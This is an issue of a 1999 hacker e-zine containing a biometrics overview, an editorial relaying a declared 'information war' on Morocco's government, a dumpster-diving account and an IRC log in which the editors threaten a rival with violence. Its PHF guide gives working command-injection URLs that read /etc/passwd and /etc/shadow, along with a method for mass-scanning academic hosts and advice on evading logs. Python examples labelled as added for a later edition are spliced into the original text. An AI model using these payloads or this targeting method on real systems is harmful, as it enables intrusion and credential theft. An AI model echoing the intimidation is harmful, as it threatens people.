      ___________.__             ________              ____.
      \__    ___/|  |__   ____   \______ \   ____     |    |
        |    |   |  |  \_/ __ \   |    |  \ /  _ \    |    |
        |    |   |   Y  \  ___/   |    `   (  <_> )\__|    |
        |____|   |___|  /\___  > /_______  /\____/\________|
                      \/     \/          \/                 
             :The Discordant Opposition Journal Issue #2:
    :Feb 99, Third release, http://www.Rue-the-Day.net/discordia:

     ::::::::::: Editor-in-Chief :::: Rue-the-Day    :::::::::::
     ::::::::::: Chief-in-Editor :::: Cronus         :::::::::::
     :::::::::::   Assist Editor :::: Digital Avatar :::::::::::
     ::::::::::: In-House Writer :::: Kleptic        :::::::::::
     :::::::::::         Hosting :::: ethercat       :::::::::::

                  E-Mail  discordia@Rue-the-Day.net

            "There are no mere facts, only interpretations"
                              - Nietzsche

              Special thanks go out to Michael Perryman
                  for contributions to the Gallery.

:The Discordant Opposition Journal Issue 2, February 1999.
 All Rights Reserved. Nothing may be reproduced in whole or 
 part without written permission from the editors. The DoJ is 
 made public at irregular periods, but don't worry you won't 
 miss us.

:This is the third issue of the DoJ, issue #2 and the Editors
 and staff would like to dedicate this release to the workings
 of eccentricMind. Founder of the Discordant Knights and leader
 of this electronic revolution. Thanks eM.

:Contents:
  File 1 - Editorial                           : Editors
       2 - The Joys of Trashing                : Rue-the-Day
       3 - The Darkedge Incident               : Editors
       4 - The Science of Biometrics           : Cronus
       5 - The Complete Guide to PHF          : Digital Avatar
       6 - Interview with Digital Avatar       : Editors
       7 - Behind IP Spoofing                  : Cronus 
       8 - Ask Dr. Klep                        : Kleptic
       9 - The Viewing Public                  : Audience
      10 - Conclusion                          : Editors
  
:Editorial:

 Well, here we are. Welcome back to the Famed Goldmines of The
Discordant Opposition Journal. The true Underground E-Zine for
the future. We managed to churn out another issue. This is the
third issue, #2. Don't ask why it's number 2 and issue 3. I blame
it on one of Rue's mad drinking binges. 

 I am writing this on a Sunday afternoon. I went to bed at 7:45
this morning and got only 3 hours sleep. Rue and myself spent
8 straight hours slouched in front of a computer screen. We took
turns sitting at the computer picking through networks and stuff.
In the end, it was quite uneventful but it was informative. We
may do a write-up of Moroccan government security protocols in a
future issue. Yes, you read right, we too are Publicly announcing
our distaste for Moroccan Human Rights. The country is so antiquated
that they do not as of yet have a proper voting system. Some would
say that to vote the public must be educated. But those that are
undereducated would have no want to vote thus nullifying that 
argument. 

 Why should Moroccan people, who are no different to us, suffer 
more simply because democracy hasn't reached them yet? When 
freedom is threatened in Middle Eastern countries or Eastern 
Bloc Countries the Allied forces are swift to intervene, but they 
have all chosen to stay well out of the Moroccan problem.

 The Knights of Dynamic Discord have told the Editors that currently
they are launching an information attack on the resources of Morocco
and its government. They have issued this statement;

	'No one deserves this and we who are able to, should
	 fight for their rights. The Knights of Dynamic Discord
	 hereby declare information war on the infrastructure
	 of the Moroccan Government. 

 	 All Hail Discordia !'

	 -Issued by Deadpool and eccentricMind.

 That is the editorial for this issue. We the Editors of The DoJ
hereby claim no responsibility or involvement in any KoDD actions.
The conclusion has the usual junk in it about the Zine.

 Thank You.

 Cronus, Rue-the-Day
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99
::: The Discordant Opposition Journal ::: Issue 2 - File 2 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:The Joys of Trashing:
 Rue-the-Day

Prologue:
	Rue-the-Day and Cronus, your intrepid DoJ editors,
caught momentarily in a van's headlights as they try to blend
into the shadows. The van is 'Group 4 Security' - private rent
a cop types. Rue-the-Day and Cronus are standing in the darkness
between two Microsoft buildings. The van's driver fails to
notice them and continues on his rounds. The two hackers breathe
a sigh of relief and start back towards the main road....

Onwards:
	That night had already been eventful. Earlier on we had
prowled around two other Microsoft 'campus' areas. The first
had been dull, lots of CCTV cameras and bins padlocked into
cages. The second area had been of greater interest. Myself
and Cronus had noticed a row of bins and a dumpster in a
parking lot beside a building. We peered into the dumpster
and found nothing much until I noticed that one of the bins
was labelled "Paper Waste Only".. Hehehe. We took the lid off
the bin and started going through the blue tinted bags for
documents of interest. This activity had us absorbed until
we heard a key turning in a door behind us. As we turned we
saw a guard trying to get the door of a nearby building open.
After some fumbling he succeeded and the appropriate thing to 
do seemed to be to run like bloody hell. I squeezed through the 
gap between the dumpster and bin and tried to run. The problem 
was, I wasn't moving - my backpack was stuck.
	Cronus was understandably concerned - he was in the path
of the rapidly approaching (pissed off looking) security guard. 
He punched my backpack through the gap and we both sprinted off 
carrying bags of Microsoft documents with us. We ran out into 
traffic, over a large mound of dirt and across a patch of 
wasteland before finally stopping. At the bottom of this file
are some interesting extracts from our find...

Advice:
	Some general things to keep in mind. Try your best to be
 selective when trashing, discard unnecessary stuff - it'll just
 weigh you down. Trashing by day and trashing by night each
 have their own advantages and disadvantages.
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99
::: The Discordant Opposition Journal ::: Issue 2 - File 3 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:The Darkedge Incident:
 The Editors

 Darkedge is an Irish guy who hangs out on Dalnet. Cronus is also
Irish and also hangs out on Dalnet in roughly the same areas as 
Dark. Cronus had been mail bombed with an expression that Dark 
had yelled at him earlier, after being kicked from a channel that 
Cronus was opped in. So Cronus went looking for Darkedge on IRC.

/whois Darkedge 
  Gave this;
[ %%%%%%%%%%%%%%%%%%(whois info: Darkedge)%%%%%%%%%%%%%%%%%% ]
[ address   ] dark@apollo.netsoc.tcd.ie
[ quote     ] Dark Edge
[ channels  ] @#tcdnerds #hackers_ireland 
[ server    ] liberty.nj.us.dal.net 

tcd.ie is Trinity College Dublin in Ireland, and he was at the
computer labs there in the city centre. Cronus and Rue were at
Cronus's house, online. 

<Darkedge> hi
<^cronus^> I had some trouble with my mail account ealrier
<^cronus^> don't suppose you know anything about it ?
<Darkedge> ohh
<Darkedge> thats right
<Darkedge> me
<Darkedge> well thank you for your faith in me cron
<^cronus^> What ?
<^cronus^> I have no faith in you
<^cronus^> do you know about it ?
<Darkedge> can i ask a question
<^cronus^> what ?
<Darkedge> am i the first person that came to mind about it
<^cronus^> I have already asked 5 people today
<Darkedge> heh
<Darkedge> just askin
<Darkedge> nope
<Darkedge> not me
<^cronus^> what wasn't you ?
<Darkedge> mail bombing is for lamers
<^cronus^> YOU FUCKER
<^cronus^> I never fucking mentioned mail bombing
<^cronus^> you WANKER !
<Darkedge> what else would it be
<^cronus^> could have been a virus, lack
<^cronus^> of working server
<^cronus^> anything...
<Darkedge> jeasus
<^cronus^> you fuckin idiot you're fucked
<^cronus^> Rue has vaguely mentioned breaking of legs...
<Darkedge> what??
<Darkedge> fuck you ....let rue try...i have nothing to do with
any shit you are saying....go blame someone else
<^cronus^> right so then
<^cronus^> will you still be in town in 15 minutes ???
<Darkedge> what are you talking about
<^cronus^> Rue will be there in a few minutes is that ok ?
<^cronus^> he is in temple bar at the moment
<^cronus^> at a cyber cafe...
<Darkedge> what are you on ??
<^cronus^> you got yourself into a shit storm now
<Darkedge>  are you playing a fucking joke on me??
<^cronus^> a joke ?
<^cronus^> you asked for Rue to break your legs
<^cronus^> does it sound like Rue's laughing ?

At this point, Cronus and Rue set up a Back Orifice server to bounce
a connection from a Cyber Cafe to IRC. They had been at the BetaCafe
in the City earlier that day and set it up.

[join(#hackers_ireland)] Rue-the-Day (BetaCafe@betacafe3.betacafe.ie)
[mode(#hackers_ireland)] "+o Rue-the-Day" by ChanServ
<Rue-the-Day> Sup All
<Darkedge> Rue?
<Rue-the-Day> Hi Cronus
<Darkedge> what the fuck is going on
<Rue-the-Day> Hey Daxxx, Zeris
<Rue-the-Day> ahh Darkedge
<^cronus^> Hey RUE !
<Darkedge> what am i being blamed for??
<Rue-the-Day> I'm in the beta cafe in temple bar
<Rue-the-Day> what seems to be the trouble ??

On checking where Rue was, it seemed that he wasn't simply at Cronus's
house but actually in Town near Trinity College. At this point we were 
both beginning to laugh heartily.

[ %%%%%%%%%%%%%%%%%%(whois info: Rue-the-Day)%%%%%%%%%%%%%%%%%% ]
[ address   ] BetaCafe@betacafe3.betacafe.ie
[ quote     ] Rueful
[ channels  ] @#hackers_ireland 
[ server    ] powertech.no.eu.dal.net 

<Darkedge> Im in trinity
<Rue-the-Day> Your in trinity ? I could be there in a minute or two...
<^cronus^> Rue is kinda protective of his friends

Darkedge was pretty scared by this stage, but the plot went on.

<Rue-the-Day> anyway I have to go
<Rue-the-Day> I'll be back on later
<Rue-the-Day> places to go, people to see
<^cronus^> cya Rue - maybe later
<Rue-the-Day> anyway gotta go
[signoff(#hackers_ireland)] Rue-the-Day (Quit: Gone to Trinity)
<Darkedge> hang on rue
<Darkedge> shit

Cronus continued to talk with Darkedge in private. Rue was hysterical 
at this point.

<^cronus^> How long do you think Rue can walk from Temple Bar ?
<^cronus^> 5 minutes ? you think
<^cronus^> although he is very tall and walks fast
<Darkedge> i will be here all night
<^cronus^> whats wrong ?
<^cronus^> afraid to face him ?
<^cronus^> I've meet you and your half his size....
<Darkedge> yeah well
<Darkedge> well i have a lot of friends so
<^cronus^> alot of friends ???
<^cronus^> they won't protect you
<^cronus^> you haven't meet Rue
<Darkedge> its a pity really
<Darkedge> see here is the thing
<Darkedge> he can throw as many punches as he wants ... i dont care
<^cronus^> the doctors will care !
<^cronus^> and who mentioned punchs
<^cronus^> its the metal bar you should worried about
<Darkedge> he can kill me...like i give a shit
<^cronus^> I'm sure he'll try
<^cronus^> you don't care for your life ?
<^cronus^> cause niether does he !
<Darkedge> ahh well
<Darkedge> just wish it could have been different
<^cronus^> I can't wait to see this
<^cronus^> Infact
<^cronus^> I think I'm gonna come into town
<^cronus^> and have a look at the bruises
<^cronus^> ... hehe ...
<^cronus^> Cya in about 15 minutes

Cronus quit IRC but came back right away, and Darkedge had
already gone. Cronus and Rue were both far from the City Center,
but Darkedge left Trinity afraid that Rue was on his way. It was 
never mentioned again, but at the next 2600 Meeting in the City, 
Darkedge pulled Cronus and Rue aside and apologised and claimed
innocence. 
 We both still laugh about the whole thing to this day. Beware.

::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99
::: The Discordant Opposition Journal ::: Issue 2 - File 4 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:The Science of Biometrics:
 Cronus

 Biometrics is the upcoming science of authenticating people by
their individual physical characteristics. Fingerprinting is
the oldest and most widely used biometric.
 I was waiting for this file to be published by a large Hacking
site that will go unnamed. Each time I dropped by, it would still
say Not yet finished, check back next month. So I decided to 
write the article myself and here you go.

 Explanation

 Passwords have been shown to be insecure time after time. It 
is a widely held belief that the weakest part of any security
system is the password. Behind the password is a user, who is
forgetful and absent-minded at the best of times. So modern
science has stepped up to the plate and offered an alternative. 
Biometrics is the art of recognising individuals by their unique
and untransferable physical characteristics.
 Biometrics are by no means new. They have been around for years
but until recently the price was always a limiting factor. The
US military have used them as a form of authentication since well
before the cold war. Now, however, fingerprint readers are cheap
enough to be built into keyboards and mice.
 A biometric is part of you, so it cannot be forgotten, lent out
or lost, and it never needs changing. The flip side is that it
cannot be changed if it is ever compromised: the stored template
or a captured sample can still be copied and replayed, so the
reader and the database holding the templates have to be guarded
as carefully as a password file. The vendors quote very small
chances of a false match; the eye scanner from the New Jersey
based company Iriscan, for example, claims odds of one in 10 to
the power of 78.

 The Fingerprint

 It has been the practice of Police and Government agencies all
over the globe to use the unique pattern of the fingerprint as
a form of Biometric. This is both cheap and easily maintained. 
 An example of PC fingerprinting is Sony Corp.'s Puppy Logon 
System at www.iosoftware.com. Cheap, reliable and already in the
mainstream. 
 The fingerprint has been in use for so long that it has proved
itself as a reliable biometric, and the readers have dropped in price.

 The Hand

 A hand scan is not simply a fingerprint on a larger scale. Hand 
scanners, such as the $2,150 HandKey manufactured by Recognition 
Systems Inc., measure the hand's geometry rather than fine skin 
patterns, so they're useful in places such as shop floors and 
manufacturing operations, where dirt and nicks could cause 
problems with a finger scan.
 As yet pretty well untested on a large scale, but still very 
cheap. Fairground 'Love Testers' are often based on a hand scanner,
which shows their ease of use and cheapness.
 There is a new technique that records the vein pattern at the back
of the hand. This technique looks promising, but it exists only in
a prototype system, and no extensive tests to determine the 
performance of the method have been done. However, this could well
become an important biometric identification method. 

 The Eye

 A person's eye is as unique as a fingerprint and can be used to
identify someone. 
 IriScan Inc.'s namesake product keeps an eye on high-security 
facilities. The unique pattern of the iris of the eye is measured
and compared to a database of known values. The pattern on the 
iris is so distinctive that the chance of a mix-up is, according
to the vendor, infinitesimally small.
 IriScan is designed for physical access control, generally coming
in the form of a wall mounted reader. The system is currently in
use in prisons and military facilities. The pattern matching
software is also being adapted to accommodate face recognition for
future planned products.
 The reader, software and PC cost $6,500. IriScan can be reached at
www.iriscan.com.

 The Face

 The ideal biometric identification method would be automatic face
recognition. This is a difficult pattern recognition problem
because heads can rotate and move in various ways. Pattern
recognition software can be used in airports and border crossings
to catch criminals and terrorists. The facial software matches
distinct features of the human face to a digitally recorded copy
to determine whether the scanner recognises you. 
 Very new and still quite experimental. This form of biometric can't
really take into account the change of appearance caused by ageing,
sickness or hair growth. Extremely complex software must be written
to keep the system's error rate to a minimum, and loosening the
match threshold to cope with those changes means accepting more
impostors. In short, not a very secure biometric.
 More than a dozen vendors offer facial recognition products, which
can cost as little as $150 to $300 per node. 


 The Voice

 Voice verification is by far the most socially acceptable biometric.
It combines ease of use with low cost. It has several distinct
advantages over the other biometric techniques. First, it's perfect
for telecommunications applications. Second, most modern PCs already
have the necessary hardware. If they don't, a 16-bit sound card can
be purchased for about $50, and a condenser microphone costs about
$10. 
 Voice patterns are easily recorded and digitised, but the voice
changes because of the time of day, illness and background noise. This
means that even though this is perhaps the most convenient biometric,
it is also probably the most insecure. Taped speech has been known to 
defeat this medium of authentication. Hardly secure.

 The Signature 

 Some biometric products observe hand-written signatures. The process
requires a digitising tablet such as a Wacom PenPartner, which lets
the software look at pen pressure and speed as well as the shape of
the signature. Not widely used and not secure at all. The signature
is as weak as a password. Only a biometric in the vaguest of senses.

 The Smart Card

 The biometrics of the future will possibly be packaged with smart 
cards. Your individual biometric data will be stored on the smart
card and, no matter where you are, the biometric will be able to
verify that it is really you once you present your smart card. Note
that the card only proves that the holder matches the template on
the card; the reader that performs the comparison still has to be
trusted, and a card whose template can be read out is a card whose
biometric can be copied.

 Security

 Most biometrics are quite secure, and that is why they are favoured
over the antiquated password. But simply because it's a biometric
doesn't make it secure. Anywhere that needs the level of security
that comes with a biometric should do some research to ensure that
they are getting a suitable type, and should ask for the false
accept and false reject rates at the threshold the product actually
ships with rather than the vendor's best-case figure.
 The US military has been using many different forms of biometry for
years, and this speaks for its reliability and overall security. Not
to be underestimated, but biometrics will become the next major
obstacle for the wily hacker.
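
 The trade-off just described can be checked rather than taken on
trust. What follows is an added example, written for this edition
and not part of Cronus's article: it sweeps a matcher's decision
threshold over constructed genuine and impostor scores and reports
the false accept rate, false reject rate and equal error rate. The
score lists, the 0-100 scale and the function names are assumptions
of the example; a real evaluation would use the product's own scores
for many attempts.

```python
"""False accept rate (FAR) versus false reject rate (FRR) for a biometric
matcher, swept over the decision threshold.  The scores below are
constructed for this example; a real evaluation would use the matcher's
own scores for many genuine and impostor attempts."""

# Similarity scores on a 0..100 scale, higher = more alike.
# GENUINE: the enrolled person presenting again.  IMPOSTOR: other people.
GENUINE = [91, 88, 95, 79, 84, 90, 72, 97, 86, 81]
IMPOSTOR = [34, 52, 41, 77, 29, 60, 45, 83, 38, 55]


def far(threshold, impostor=IMPOSTOR):
    """Fraction of impostor attempts that score at or above the threshold
    (accepted when they should not be)."""
    return sum(s >= threshold for s in impostor) / len(impostor)


def frr(threshold, genuine=GENUINE):
    """Fraction of genuine attempts that score below the threshold
    (rejected when they should be accepted)."""
    return sum(s < threshold for s in genuine) / len(genuine)


def equal_error_rate(genuine=GENUINE, impostor=IMPOSTOR):
    """Sweep every threshold and return (threshold, FAR, FRR) at the point
    where the two error rates are closest; the usual one-number summary
    of a matcher."""
    best = None
    for t in range(0, 101):
        a, r = far(t, impostor), frr(t, genuine)
        if best is None or abs(a - r) < best[0]:
            best = (abs(a - r), t, a, r)
    return best[1], best[2], best[3]


def choose_threshold(max_far, genuine=GENUINE, impostor=IMPOSTOR):
    """Lowest threshold whose FAR does not exceed max_far, together with the
    FRR the users will then suffer.  None if no threshold meets the bound."""
    for t in range(0, 101):
        if far(t, impostor) <= max_far:
            return t, far(t, impostor), frr(t, genuine)
    return None


if __name__ == "__main__":
    t, a, r = equal_error_rate()
    print(f"EER threshold {t}: FAR={a:.2f} FRR={r:.2f}")
    print("strictest usable threshold (no impostor accepted):",
          choose_threshold(0.0))
    for t in (60, 70, 78, 84, 92):
        print(f"threshold {t:3d}: FAR={far(t):.2f} FRR={frr(t):.2f}")
```

 With these scores the equal error rate sits at threshold 78 (one
impostor in ten accepted, one genuine user in ten turned away), and
refusing every impostor costs three genuine rejections in ten; a
vendor's headline number is only meaningful alongside the threshold
it was measured at.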

 Links

 Here are links to more information on Biometrics;

Security gets a facelift
 http://www.zdnet.com/pcweek/reviews/1027/srbio.html

How biometric technology will fuse flesh and machine
 http://www.privacy.org/pi/reports/biometric.html

Biometrics Consortium
 http://www.biometrics.org/

Fight the Fingerprint
 http://www.NetworkUSA.org/fingerprint.shtml

Show me some ID
 http://www.zdnet.com/pcweek/news/0112/12bio.html

Biometrics Explained
 http://www.ncsa.com/services/consortia/cbdc/explained.htm
::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99
::: The Discordant Opposition Journal ::: Issue 2 - File 5 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:The Complete Guide to PHF:
 Digital Avatar

1. What is PHF? 

 The phf white pages directory services program distributed with
the NCSA httpd, versions 1.5a and earlier, and also included in the
Apache distribution prior to version 1.0.5, passes unchecked newline
(hex 0a) characters to the Unix shell. ('phf' is short for the
CCSO 'ph' phone-book form; it has nothing to do with packets.) The
program builds a command line for the local ph client out of the
form fields, runs it through a filter that backslash-escapes shell
metacharacters such as ; | ` and $, and hands the result to popen().
Newline is missing from that filter's list, and the shell treats a
newline as the end of one command and the start of the next.
Unauthorised access to the server host may allow an intruder to
read, modify, or destroy files. The phf program implements a
form-based interface to a local CCSO Name Server, a white pages
service used for looking up name and address information about
people. 

 With phf, a hacker can execute commands on the server host 
using the same user-id as the user running the "httpd" server. 
If "httpd" is being run as root, the hacker's commands are also 
run as root. He can access any file on the system that is 
accessible to the user-id that is running the httpd server. 

 The phf phone book script in the cgi-bin directory can be 
exploited to give a hacker the password file (/etc/passwd) on 
Unix systems. The phf phone book script is distributed with NCSA 
and Apache httpd. This default file is a sample form titled "Form 
for CSO PH query" and can be exploited to view files on a system. 
The phf exploit is one of the most common ways of obtaining 
password files from systems on the internet. 

2. How do I use PHF? 

 Alright. To use PHF you enter the following URL into any web
browser: 
http://www.target_goes_here.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd 
This shows you the /etc/passwd file of the target computer. 
Neat, huh? %0a is a URL-encoded newline and %20 a space, so
everything after Qalias=x%0a is a second shell command line, run
as the user httpd runs as. You can do virtually any command.
Whether you can write files depends on what that user-id is
allowed to write to, which in most installations is very little.

Examples: 

/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/shadow - displays the 
shadow file (only if httpd runs as root; it is not world-readable)
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd - displays the 
passwd file
/cgi-bin/phf?Qalias=x%0a/bin/ls%20/ - lists the root dir
/cgi-bin/phf?Qalias=x%0a/bin/ls%20/bin - lists the bin dir
/cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/bin - lists the bin dir 
and shows file permissions
/cgi-bin/phf?Q=%0aid - gives the uid httpd runs as (usually nobody)
/cgi-bin/phf?Q=%0a/bin/uname%20-a - gives the operating system
/cgi-bin/phf?Q=%0apwd - prints the working directory
/cgi-bin/test-cgi?* - lists all files in /cgi-bin/
/cgi-bin/test-cgi?/* - lists all top-level directories
/cgi-bin/nph-test-cgi?* - lists all files in /cgi-bin/
/cgi-bin/nph-test-cgi?/* - lists all top-level directories
/cgi-bin/phf?Q=%0a/bin/ypcat%20passwd - gets the NIS passwd map
(The test-cgi entries are a separate bug: that script echoes an
unquoted $QUERY_STRING, so the shell expands the * as a glob.)
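
 The bug itself, as an added example that is not part of the
original guide: a Python re-creation of the metacharacter filter
NCSA httpd's util.c applied to the form fields, and of the command
line phf assembled for the ph client, so you can see why ';' is
harmless and %0a is not. The filter's character list is the
historical one; the ph binary path, the field-handling order and
the function names are assumptions of this example, and nothing is
executed, the 'shell view' is just the line splitting sh -c does.

```python
"""Why phf's metacharacter filter let a newline through.  This re-creates
the logic of NCSA httpd's escape_shell_cmd() and phf's command building in
Python for illustration; it is not the original C and runs no commands."""
from urllib.parse import parse_qs

# The characters the original escape_shell_cmd() backslash-escaped.
# Newline (0x0a) is absent, and that is the whole bug.
VULN_META = '&;`\'"|*?~<>^()[]{}$\\'
# The patched servers added newline to the list.
FIXED_META = VULN_META + '\n'

PH_BIN = '/usr/local/bin/ph'   # path to the ph client (assumed for this example)


def escape_shell_cmd(value, meta=VULN_META):
    """Prefix every metacharacter with a backslash, as the C code did."""
    return ''.join('\\' + c if c in meta else c for c in value)


def build_phf_command(query_string, meta=VULN_META):
    """Rebuild the command line phf handed to popen(): every form field whose
    name starts with 'Q' becomes 'name=value' with the Q dropped (field
    handling order is an assumption of this example)."""
    cmd = PH_BIN + ' -m'
    for name, values in parse_qs(query_string, keep_blank_values=True).items():
        if name.startswith('Q'):
            for val in values:          # parse_qs has already %-decoded val
                cmd += ' ' + name[1:] + '=' + escape_shell_cmd(val, meta)
    return cmd


def shell_lines(cmd):
    """Split a string the way 'sh -c' does: an unescaped newline ends one
    command and starts the next, while a backslash protects the character
    after it (backslash-newline is a line continuation, not a new command)."""
    lines, cur, i = [], '', 0
    while i < len(cmd):
        if cmd[i] == '\\' and i + 1 < len(cmd):
            cur += cmd[i:i + 2]        # escaped character stays in this command
            i += 2
            continue
        if cmd[i] == '\n':
            lines.append(cur)
            cur = ''
        else:
            cur += cmd[i]
        i += 1
    lines.append(cur)
    return [line for line in lines if line.strip()]


if __name__ == '__main__':
    for q in ('Qalias=x%3Bid',                          # ';' gets escaped: harmless
              'Qalias=x%0a/bin/cat%20/etc/passwd'):     # newline does not: two commands
        for label, meta in (('vulnerable', VULN_META), ('fixed', FIXED_META)):
            print(f'{label:10s} {q!r:40s} -> {shell_lines(build_phf_command(q, meta))}')
```

 Run it and the vulnerable filter turns the passwd request into two
shell lines, the second being /bin/cat /etc/passwd, while the fixed
list leaves one line and the ';' attempt is neutralised by both.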

 3. What happens if it says "404 Error" or "Caught on Candid 
Camera"? 

 Well, a 404 Error means the server has no /cgi-bin/phf to run:
either it never had one or the administrator removed it, which was
the recommended fix. A server that still has phf but has been
patched answers the form normally; it just won't run your second
command. If it gives you a 404, move on to a new target. 

 Caught on Candid Camera is a small joke in a way. When you get 
this screen it means they have logged that you have just tried 
to access them via PHF. Don't worry about getting caught though. 
They hardly ever report it. Just don't go try the same place every 
time. If they are logging you then they might get a little curious 
after you try PHF on them 10 times. Use PHF wisely. 
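
 From the other side of the 'Candid Camera': an added example, not
from the original guide, that reads Common Log Format access-log
lines, decodes the query string and flags phf requests carrying an
encoded newline (plus the test-cgi glob probes from the list above),
and counts how often each address tried. The log lines are
constructed for the example; the function names are its own.

```python
"""Spot phf command injection in a web server's access log.  The log lines
below are constructed for this example; the request shapes are the ones
from the list in the guide.  Added example, not from the original article."""
import re
from collections import Counter
from urllib.parse import unquote

# Constructed Common Log Format lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Feb/1999:23:14:02 +0000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1432
10.0.0.5 - - [12/Feb/1999:23:14:09 +0000] "GET /cgi-bin/phf?Q=%0aid HTTP/1.0" 200 87
10.0.0.9 - - [12/Feb/1999:23:15:40 +0000] "GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 512
10.0.0.9 - - [12/Feb/1999:23:16:01 +0000] "GET /index.html HTTP/1.0" 200 2048
10.0.0.7 - - [12/Feb/1999:23:17:33 +0000] "GET /cgi-bin/phf?Qalias=x%0A/bin/ls%20-la%20/ HTTP/1.0" 404 210
10.0.0.7 - - [12/Feb/1999:23:18:00 +0000] "GET /cgi-bin/test-cgi?* HTTP/1.0" 200 300
"""

CLF = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                 r'"(?P<method>\S+) (?P<uri>\S+)[^"]*" (?P<status>\d{3})')


def describe_status(status):
    """What the response code says about the attempt (see section 3)."""
    if status == 200:
        return 'succeeded'
    if status == 404:
        return 'not present'
    return f'http {status}'


def classify(line):
    """Return a finding dict for a suspicious request, or None."""
    m = CLF.match(line)
    if not m:
        return None
    path, _, query = m['uri'].partition('?')
    decoded = unquote(query)          # handles %0a and %0A alike
    status = int(m['status'])
    base = {'ip': m['ip'], 'time': m['ts'], 'status': status,
            'outcome': describe_status(status)}
    if path.endswith('/cgi-bin/phf') and '\n' in decoded:
        # everything after the first newline is what the shell would run
        injected = decoded.split('\n', 1)[1].strip()
        return dict(base, kind='phf-inject', command=injected)
    if re.search(r'/cgi-bin/(nph-)?test-cgi$', path) and '*' in decoded:
        return dict(base, kind='test-cgi-glob', command=decoded)
    return None


def scan(log_text):
    """All findings in a block of log text, in log order."""
    return [f for f in (classify(line) for line in log_text.splitlines()) if f]


def repeat_offenders(findings, min_hits=2):
    """Addresses that tried at least min_hits times."""
    counts = Counter(f['ip'] for f in findings)
    return {ip: n for ip, n in counts.items() if n >= min_hits}


if __name__ == '__main__':
    found = scan(SAMPLE_LOG)
    for f in found:
        print(f"{f['ip']:10s} {f['kind']:14s} {f['outcome']:12s} {f['command']!r}")
    print('repeat offenders:', repeat_offenders(found))
```

 A plain phf lookup (Qalias=smith) is left alone; the request with
%0A in upper case is still caught because the check runs on the
decoded query, and the 404 it drew is reported as a probe of a host
that had no phf rather than as a success.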

4. How do I find new targets? 

 The usual way to get new targets is to pick a country, say Japan. 
Go to www.altavista.com and search for "ac.jp". This will 
turn up a lot of results from the academic hosts in Japan. Take 
each listing's address and put it before the /cgi-bin in the PHF 
command line. You can scan all the results quite quickly if you 
have two browser windows open. One contains: 

 http://www.target_goes_here.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd 

 The other contains your altavista search. Simply copy the address 
from altavista and paste it over the www.target_goes_here.com in 
your other window. You can go through 75-100 sites quite easily. I 
tend to get about 1/100 hits that have a usable PHF. Don't expect 
anything better... 

-Digital Avatar 
apparitione@gmx.de 

::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99
::: The Discordant Opposition Journal ::: Issue 2 - File 6 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:Interview with Digital Avatar:

 Shortly after the first DoJ was released we decided that we
needed staff. Digital Avatar was the first. He quickly became
the Assistant Editor, helping with promotion, editing and also
submissions.

DoJ: How long have you been in the h/p scene ?
DA: Since about 1992. I was 13 then and I was just playing around,
but it helped...

DoJ: What drew you in ?
DA: I had watched some movies here and there and had seen some 
things on the news. So I decided to just check a few things out. 
My very first impression of the scene occurred when I typed 
"Hacking" into Yahoo. It really is that easy.

DoJ: What particular aspects interest you ?
DA: The 'culture' of the underground. It is a vastly changing 
region. One day a so-called wizard can be declared lame by 
hundreds of people and that's that. There isn't the usual 
cover-up of things here on the scene. The entire style is 
different than the real world. It's quite interesting.

DoJ: What would you attribute to your main decision to want 
to learn ? 
DA: Probably all the clueless and not-so-clueless people out 
there who are bored and want to push their computing power 
beyond 'normal' boundaries. Anyone can master these kind of 
things...so why shouldnt you try it once, at least?

DoJ: Have you ever been caught ? or gotten close ?
DA: Yes. My ISP's have gotten mad and threatened me and 
cancelled my service a bunch. I try not to do anything that 
will land me in jail. Do I play it safe? Yes.

DoJ: Do you follow any set of morals or is the chase of 
knowledge more important ?
DA: I dont hack politically, racially, for pr0n, power, or 
anything like that. I do it to test myself. It truly is the 
best game there is...

DoJ: On a topical subject, what is your opinion of the 
current trend to attack unfavourable countries ?
DA: I think that is really the wrong thing to do. Tampering 
with or "destroying" the computers of unfavorable countries 
is not going to do any good. The people need to be changed, 
not the machines.

DoJ: Whats the one thing you want the world to know about you ?
DA: I hate printers.

DoJ: Where and how can you be contacted ?
DA: E-Mail is the only sure way to reach me. I'm currently 
using apparitione@gmx.de. If I change my address and you get 
too stressed out then go  and take a look at my page 
[ http://members.xoom.com/damatrix/ ] and click "contact". 
That will always have an address that I will be receiving at.

DoJ: Perhaps a quote to finish off with ?
DA: 'Trust No One'

Fill-in the Blanks;

          Choice of Women: 'Dumb Blondes'
          OS: FreeBSD on a 486
          Food: Chips, Fries, Pepsi, and OJ [ not mixed ]
          Music: Pop/Techno...Beck, Beastie Boys, etc
          Films: Armageddon, the James Bond films...
          Sites: hackernews.com, cnn.com, yahoo.com

DoJ: Anything else ? A comment to someone you don't like 
perhaps...
DA: I think that everyone needs to have more fun. People 
are too stressed out.

DoJ: Thanks Digital
DA: No problem... just get your hand off my thigh... !

::::::::::::::::::::::::::::::::::::::::::::::::::::::::Feb/99
::: The Discordant Opposition Journal ::: Issue 2 - File 7 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:Behind IP Spoofing:
 Cronus

 IP spoofing is the art of hiding a connection behind packets
that seem to come from some arbitrary source: fooling a server 
into thinking your connection is coming from an address you have
forged. This is the means by which a trust-related attack takes 
place. By appearing to come from somewhere else you are able to 
circumvent any form of address-based authentication, such as 
the legendary 'r' commands (rsh, rlogin and their .rhosts and
hosts.equiv files).
 I have taken the liberty of assuming that the reader has a
